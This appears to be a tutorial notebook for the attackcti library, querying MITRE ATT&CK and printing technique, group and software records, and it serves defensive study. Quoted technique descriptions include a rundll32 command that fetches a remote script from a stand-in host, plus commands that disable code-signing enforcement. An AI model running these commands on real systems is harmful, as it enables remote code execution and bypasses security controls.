Filtering ATT&CK


Import ATTACK API Client

from attackcti import attack_client

Import Extra Libraries

from pandas import *

Initialize ATT&CK Client Variable

lift = attack_client()

Get Technique by Name (TAXII)

You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive.

technique_name = lift.get_technique_by_name('Rundll32')
technique_name
[AttackPattern(type='attack-pattern', id='attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-01-23T18:03:46.248Z', modified='2021-01-20T18:12:11.843Z', name='Rundll32', description='Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1218/011', external_id='T1218.011'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Casey Smith', 'Ricardo Dias'], x_mitre_data_sources=['Process: Process Creation', 'Command: Command Execution', 'Module: Module Load'], x_mitre_defense_bypassed=['Digital Certificate Validation', 'Application control', 'Anti-virus'], x_mitre_detection='Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.0'),
 AttackPattern(type='attack-pattern', id='attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', created='2017-05-31T21:31:06.045Z', modified='2020-01-31T19:01:41.919Z', name='Rundll32', revoked=True, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1085', external_id='T1085'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')])]

Get Data Sources from All Techniques (TAXII)

  • You can also get all the data sources available in ATT&CK

  • Currently the only techniques with data sources are the ones in Enterprise ATT&CK.

data_sources = lift.get_data_sources()
len(data_sources)
140
data_sources
['Windows Registry: Windows Registry Key Modification',
 'Command: Command Execution',
 'Process: Process Creation',
 'Instance: Instance Metadata',
 'Process: OS API Execution',
 'Cluster: Cluster Metadata',
 'Container: Container Enumeration',
 'Container: Container Metadata',
 'Pod: Pod Enumeration',
 'Pod: Pod Metadata',
 'Application Log: Application Log Content',
 'File: File Access',
 'User Account: User Account Authentication',
 'Image: Image Creation',
 'Network Traffic: Network Connection Creation',
 'Network Traffic: Network Traffic Flow',
 'Network Traffic: Network Traffic Content',
 'Container: Container Creation',
 'Container: Container Start',
 'Instance: Instance Creation',
 'Instance: Instance Start',
 'Scheduled Job: Scheduled Job Creation',
 'File: File Creation',
 'Pod: Pod Creation',
 'Pod: Pod Modification',
 'File: File Metadata',
 'Process: Process Access',
 'Active Directory: Active Directory Object Creation',
 'Active Directory: Active Directory Object Modification',
 'Active Directory: Active Directory Object Deletion',
 'Windows Registry: Windows Registry Key Creation',
 'Logon Session: Logon Session Creation',
 'Web Credential: Web Credential Creation',
 'Web Credential: Web Credential Usage',
 'Firmware: Firmware Modification',
 'File: File Modification',
 'Cloud Service: Cloud Service Modification',
 'Cloud Service: Cloud Service Disable',
 'Module: Module Load',
 'Driver: Driver Load',
 'Script: Script Execution',
 'File: File Content',
 'Active Directory: Active Directory Credential Request',
 'Instance: Instance Enumeration',
 'Snapshot: Snapshot Metadata',
 'Snapshot: Snapshot Enumeration',
 'Cloud Storage: Cloud Storage Metadata',
 'Cloud Storage: Cloud Storage Enumeration',
 'Volume: Volume Metadata',
 'Volume: Volume Enumeration',
 'Service: Service Creation',
 'Firewall: Firewall Rule Modification',
 'Firewall: Firewall Disable',
 'Instance: Instance Modification',
 'Instance: Instance Stop',
 'Instance: Instance Deletion',
 'Snapshot: Snapshot Creation',
 'Sensor Health: Host Status',
 'User Account: User Account Creation',
 'User Account: User Account Metadata',
 'Service: Service Metadata',
 'Drive: Drive Creation',
 'File: File Deletion',
 'Firewall: Firewall Metadata',
 'Firewall: Firewall Enumeration',
 'Group: Group Enumeration',
 'Group: Group Metadata',
 'Process: Process Termination',
 'Windows Registry: Windows Registry Key Deletion',
 'Windows Registry: Windows Registry Key Access',
 'Drive: Drive Access',
 'Drive: Drive Modification',
 'Process: Process Metadata',
 'Logon Session: Logon Session Metadata',
 'Active Directory: Active Directory Object Access',
 'Network Share: Network Share Access',
 'Image: Image Metadata',
 'Scheduled Job: Scheduled Job Metadata',
 'Scheduled Job: Scheduled Job Modification',
 'Kernel: Kernel Module Load',
 'WMI: WMI Creation',
 'User Account: User Account Modification',
 'Group: Group Modification',
 'Service: Service Modification',
 'Driver: Driver Metadata',
 'User Account: User Account Deletion',
 'Image: Image Modification',
 'Cloud Storage: Cloud Storage Access',
 'Snapshot: Snapshot Modification',
 'Snapshot: Snapshot Deletion',
 'Volume: Volume Creation',
 'Volume: Volume Modification',
 'Volume: Volume Deletion',
 'Cloud Storage: Cloud Storage Modification',
 'Cloud Storage: Cloud Storage Creation',
 'Cloud Service: Cloud Service Metadata',
 'Cloud Service: Cloud Service Enumeration',
 'Image: Image Deletion',
 'Cloud Storage: Cloud Storage Deletion',
 'Network protocol analysis',
 'Packet capture',
 'API monitoring',
 'Process monitoring',
 'System calls',
 'Sequential event recorder',
 'Controller program',
 'Windows event logs',
 'Authentication logs',
 'Alarm history',
 'Alarm thresholds',
 'Data historian',
 'Netflow/Enclave netflow',
 'Process use of network',
 'Application logs',
 'Data loss prevention',
 'Third-party application logs',
 'File monitoring',
 'Process command-line parameters',
 'Network device logs',
 'Host network interfaces',
 'Web proxy',
 'Detonation chamber',
 'Digital signatures',
 'Web logs',
 'Web application firewall logs',
 'Binary file metadata',
 'Asset management',
 'Windows Registry',
 'Network intrusion detection system',
 'Alarm History',
 'process use of network',
 'SSl/TLS inspection',
 'File Monitoring',
 'Windows error reporting',
 'Windows registry',
 'Controller parameters',
 'Malware reverse engineering',
 'Anti-virus',
 'Email gateway',
 'Mail server']

Get Any STIX Object by ID (TAXII)

  • You can get any STIX object by its id across all the matrices. It is case sensitive.

  • You can use the following STIX Object Types:

    • attack-pattern > techniques

    • course-of-action > mitigations

    • intrusion-set > groups

    • malware

    • tool

object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1307')
object_by_id
[AttackPattern(type='attack-pattern', id='attack-pattern--286cc500-4291-45c2-99a1-e760db176402', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-12-14T16:46:06.044Z', modified='2020-10-26T13:42:49.342Z', name='Acquire and/or use 3rd party infrastructure services', description='This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-pre-attack', phase_name='adversary-opsec')], external_references=[ExternalReference(source_name='mitre-pre-attack', url='https://attack.mitre.org/techniques/T1307', external_id='T1307'), ExternalReference(source_name='LUCKYCAT2012', description='Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017.')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_deprecated=True, x_mitre_detectable_by_common_defenses='No', x_mitre_detectable_by_common_defenses_explanation='3rd party services highly leveraged by legitimate services, hard to distinguish from background noise.  While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.', x_mitre_difficulty_for_adversary='Yes', x_mitre_difficulty_for_adversary_explanation='Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.', x_mitre_old_attack_id='PRE-T1084', x_mitre_version='1.0')]

Get Any Group by Alias (TAXII)

You can get any Group by its Alias property across all the matrices. It is case sensitive.

group_name = lift.get_group_by_alias('Cozy Bear')
group_name
[IntrusionSet(type='intrusion-set', id='intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:52.748Z', modified='2021-04-30T12:11:56.336Z', name='APT29', description="[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)", aliases=['APT29', 'Dark Halo', 'StellarParticle', 'NOBELIUM', 'UNC2452', 'YTTRIUM', 'The Dukes', 'Cozy Bear', 'CozyDuke'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/groups/G0016', external_id='G0016'), ExternalReference(source_name='APT29', description='(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='Dark Halo', description='(Citation: Volexity SolarWinds)'), ExternalReference(source_name='StellarParticle', description='(Citation: CrowdStrike SUNSPOT Implant January 2021)'), ExternalReference(source_name='NOBELIUM', description='(Citation: MSTIC NOBELIUM Mar 2021)'), ExternalReference(source_name='UNC2452', description='(Citation: FireEye SUNBURST Backdoor December 2020)'), ExternalReference(source_name='YTTRIUM', description='(Citation: Microsoft Unidentified Dec 2018)'), ExternalReference(source_name='The Dukes', description='(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='Cozy Bear', description='(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='CozyDuke', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='White House Imposing Costs RU Gov April 2021', description='White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.', url='https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'), ExternalReference(source_name='UK Gov Malign RIS Activity April 2021', description='UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', url='https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'), ExternalReference(source_name='F-Secure The Dukes', description='F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', url='https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'), ExternalReference(source_name='GRIZZLY STEPPE JAR', description='Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.', url='https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'), ExternalReference(source_name='Crowdstrike DNC June 2016', description='Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.', url='https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/'), ExternalReference(source_name='UK Gov UK Exposes Russia SolarWinds April 2021', description='UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.', url='https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'), ExternalReference(source_name='NSA Joint Advisory SVR SolarWinds April 2021', description='NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.', url='https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF'), ExternalReference(source_name='UK NSCS Russia SolarWinds April 2021', description='UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', url='https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'), ExternalReference(source_name='FireEye SUNBURST Backdoor December 2020', description='FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.', url='https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html'), ExternalReference(source_name='MSTIC NOBELIUM Mar 2021', description='Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.', url='https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/'), ExternalReference(source_name='CrowdStrike SUNSPOT Implant January 2021', description='CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.', url='https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/'), ExternalReference(source_name='Volexity SolarWinds', description='Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.', url='https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/'), ExternalReference(source_name='FireEye APT29 Nov 2018', description='Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.', url='https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html'), ExternalReference(source_name='ESET Dukes October 2019', description='Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.', url='https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf'), ExternalReference(source_name='NCSC APT29 July 2020', description='National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.', url='https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf'), ExternalReference(source_name='Microsoft Unidentified Dec 2018', description='Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.', url='https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Matt Brenton, Zurich Insurance Group', 'Katie Nickels, Red Canary'], x_mitre_version='2.0')]

Get Relationships by Any Object (TAXII)

  • You can get available relationships defined in ATT&CK of type uses and mitigates for specific objects across all the matrices.

groups = lift.get_groups()
one_group = groups[0]
relationships = lift.get_relationships_by_object(one_group)
relationships[0]
Relationship(type='relationship', id='relationship--12e483aa-14a0-41ea-b6fd-7ced3590472b', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-04-14T14:05:51.798Z', modified='2021-04-14T14:05:51.798Z', relationship_type='uses', description='(Citation: Check Point Rocket Kitten)', source_ref='intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7', target_ref='tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5', external_references=[ExternalReference(source_name='Check Point Rocket Kitten', description='Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.', url='https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'])

Get All Techniques with Mitigations (TAXII)

The difference with this function and get_all_techniques() is that get_techniques_mitigated_by_all_mitigations returns techniques that have mitigations mapped to them.

techniques_mitigated = lift.get_techniques_mitigated_by_all_mitigations()
techniques_mitigated[0]
AttackPattern(type='attack-pattern', id='attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-04-23T01:04:57.161Z', modified='2021-04-26T15:41:39.155Z', name='Code Signing Policy Modification', description='Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1553/006', external_id='T1553.006'), ExternalReference(source_name='Microsoft DSE June 2017', description='Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.', url='https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN'), ExternalReference(source_name='Apple Disable SIP', description='Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.', url='https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection'), ExternalReference(source_name='Microsoft Unsigned Driver Apr 2017', description='Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.', url='https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test'), ExternalReference(source_name='Microsoft TESTSIGNING Feb 2021', description='Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021.', url='https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option'), ExternalReference(source_name='FireEye HIKIT Rootkit Part 2', description='Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.', url='https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html'), ExternalReference(source_name='GitHub Turla Driver Loader', description='TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.', url='https://github.com/hfiref0x/TDL'), ExternalReference(source_name='F-Secure BlackEnergy 2014', description='F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.', url='https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf'), ExternalReference(source_name='Unit42 AcidBox June 2020', description='Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.', url='https://unit42.paloaltonetworks.com/acidbox-rare-malware/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Abel Morales, Exabeam'], x_mitre_data_sources=['Windows Registry: Windows Registry Key Modification', 'Command: Command Execution', 'Process: Process Creation'], x_mitre_defense_bypassed=['Application control', 'User Mode Signature Validation', 'Digital Certificate Validation'], x_mitre_detection='Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as <code>HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing</code>. Modifications to the code signing policy of a system are likely to be rare.', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['Administrator'], x_mitre_platforms=['Windows', 'macOS'], x_mitre_version='1.0')

Get Techniques Used by Software (TAXII)

This the function returns information about a specific software STIX object.

all_software = lift.get_software()
one_software = all_software[0]
software_techniques = lift.get_techniques_used_by_software(one_software)
software_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-03-15T16:13:46.151Z', modified='2020-03-26T20:15:35.821Z', name='Web Protocols', description='Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1071/001', external_id='T1071.001'), ExternalReference(source_name='University of Birmingham C2', description='Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', url='https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content'], x_mitre_detection='Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ', x_mitre_is_subtechnique=True, x_mitre_platforms=['Linux', 'macOS', 'Windows'], x_mitre_version='1.0')

Get Techniques Used by Group (TAXII)

If you do not provide the name of a specific Group (Case Sensitive), the function returns information about all the groups available across all the matrices.

groups = lift.get_groups()
one_group = groups[0]
group_techniques = lift.get_techniques_used_by_group(one_group)
group_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-03-11T14:49:36.954Z', modified='2020-03-11T14:55:56.177Z', name='Malicious File', description="An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.\n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1204/002', external_id='T1204.002')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['Process: Process Creation', 'File: File Creation'], x_mitre_detection="Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).", x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['Linux', 'macOS', 'Windows'], x_mitre_version='1.0')

Get Software Used by Group (TAXII)

You can retrieve every software (malware or tool) mapped to a specific Group STIX object

groups = lift.get_groups()
one_group = groups[0]
group_software = lift.get_software_used_by_group(one_group)
group_software[0]
Tool(type='tool', id='tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2018-04-18T17:59:24.739Z', modified='2018-10-17T00:14:20.652Z', name='Havij', description='[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)', labels=['tool'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/software/S0224', external_id='S0224'), ExternalReference(source_name='Check Point Havij Analysis', description='Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.', url='https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_aliases=['Havij'], x_mitre_platforms=['Linux', 'Windows', 'macOS'], x_mitre_version='1.0')